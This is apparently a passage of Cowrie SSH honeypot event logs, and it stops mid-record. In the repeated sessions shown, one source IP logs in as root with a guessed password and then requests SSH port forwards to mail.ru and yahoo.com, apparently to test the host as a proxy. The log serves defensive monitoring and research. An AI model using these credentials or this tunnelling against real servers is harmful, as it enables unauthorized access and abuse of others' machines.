{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.211535Z","src_ip":"77.83.207.83","session":"ea32d1e1035d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":22696,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22696","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.352283Z","session":"ea32d1e1035d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.402146Z","src_ip":"77.83.207.83","session":"ea32d1e1035d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":20392,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:20392","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.544234Z","session":"ea32d1e1035d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.594211Z","src_ip":"77.83.207.83","session":"ea32d1e1035d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.644854Z","src_ip":"77.83.207.83","session":"ea32d1e1035d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3395,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4b5ef795a4b","protocol":"ssh","message":"New connection: 77.83.207.83:3395 (1.2.3.4:22) [session: c4b5ef795a4b]","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.693655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.694332Z","src_ip":"77.83.207.83","session":"c4b5ef795a4b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.744579Z","src_ip":"77.83.207.83","session":"c4b5ef795a4b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.992913Z","src_ip":"77.83.207.83","session":"c4b5ef795a4b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9631,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:9631","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.043738Z","session":"c4b5ef795a4b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.093583Z","src_ip":"77.83.207.83","session":"c4b5ef795a4b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":7742,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7742","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.236160Z","session":"c4b5ef795a4b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.286221Z","src_ip":"77.83.207.83","session":"c4b5ef795a4b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":7949,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7949","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.428208Z","session":"c4b5ef795a4b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.478628Z","src_ip":"77.83.207.83","session":"c4b5ef795a4b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.529433Z","src_ip":"77.83.207.83","session":"c4b5ef795a4b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3499,"dst_ip":"1.2.3.4","dst_port":22,"session":"52f6f96e7c30","protocol":"ssh","message":"New connection: 77.83.207.83:3499 (1.2.3.4:22) [session: 52f6f96e7c30]","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.578368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.579191Z","src_ip":"77.83.207.83","session":"52f6f96e7c30"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.629192Z","src_ip":"77.83.207.83","session":"52f6f96e7c30"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.878319Z","src_ip":"77.83.207.83","session":"52f6f96e7c30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32659,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32659","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.929391Z","session":"52f6f96e7c30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:29.980300Z","src_ip":"77.83.207.83","session":"52f6f96e7c30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":26635,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:26635","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.120318Z","session":"52f6f96e7c30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.170351Z","src_ip":"77.83.207.83","session":"52f6f96e7c30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":6814,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6814","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.312520Z","session":"52f6f96e7c30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.362578Z","src_ip":"77.83.207.83","session":"52f6f96e7c30"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.413354Z","src_ip":"77.83.207.83","session":"52f6f96e7c30"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3588,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e44c6a4d51d","protocol":"ssh","message":"New connection: 77.83.207.83:3588 (1.2.3.4:22) [session: 9e44c6a4d51d]","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.464243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.464968Z","src_ip":"77.83.207.83","session":"9e44c6a4d51d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.516522Z","src_ip":"77.83.207.83","session":"9e44c6a4d51d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.771729Z","src_ip":"77.83.207.83","session":"9e44c6a4d51d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9069,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:9069","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.823860Z","session":"9e44c6a4d51d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:30.875056Z","src_ip":"77.83.207.83","session":"9e44c6a4d51d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":3574,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:3574","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.017887Z","session":"9e44c6a4d51d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.069961Z","src_ip":"77.83.207.83","session":"9e44c6a4d51d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":29335,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29335","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.213936Z","session":"9e44c6a4d51d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.265892Z","src_ip":"77.83.207.83","session":"9e44c6a4d51d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.317939Z","src_ip":"77.83.207.83","session":"9e44c6a4d51d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3679,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebe2bb48e66e","protocol":"ssh","message":"New connection: 77.83.207.83:3679 (1.2.3.4:22) [session: ebe2bb48e66e]","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.367362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.368237Z","src_ip":"77.83.207.83","session":"ebe2bb48e66e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.418961Z","src_ip":"77.83.207.83","session":"ebe2bb48e66e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.672965Z","src_ip":"77.83.207.83","session":"ebe2bb48e66e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1346,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1346","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.725694Z","session":"ebe2bb48e66e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.776702Z","src_ip":"77.83.207.83","session":"ebe2bb48e66e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":22163,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22163","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.921325Z","session":"ebe2bb48e66e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:31.972176Z","src_ip":"77.83.207.83","session":"ebe2bb48e66e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17136,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17136","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.117157Z","session":"ebe2bb48e66e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.168036Z","src_ip":"77.83.207.83","session":"ebe2bb48e66e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.219569Z","src_ip":"77.83.207.83","session":"ebe2bb48e66e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3760,"dst_ip":"1.2.3.4","dst_port":22,"session":"23bdeb949165","protocol":"ssh","message":"New connection: 77.83.207.83:3760 (1.2.3.4:22) [session: 23bdeb949165]","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.269286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:32.270436Z","src_ip":"77.83.207.83","session":"23bdeb949165"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","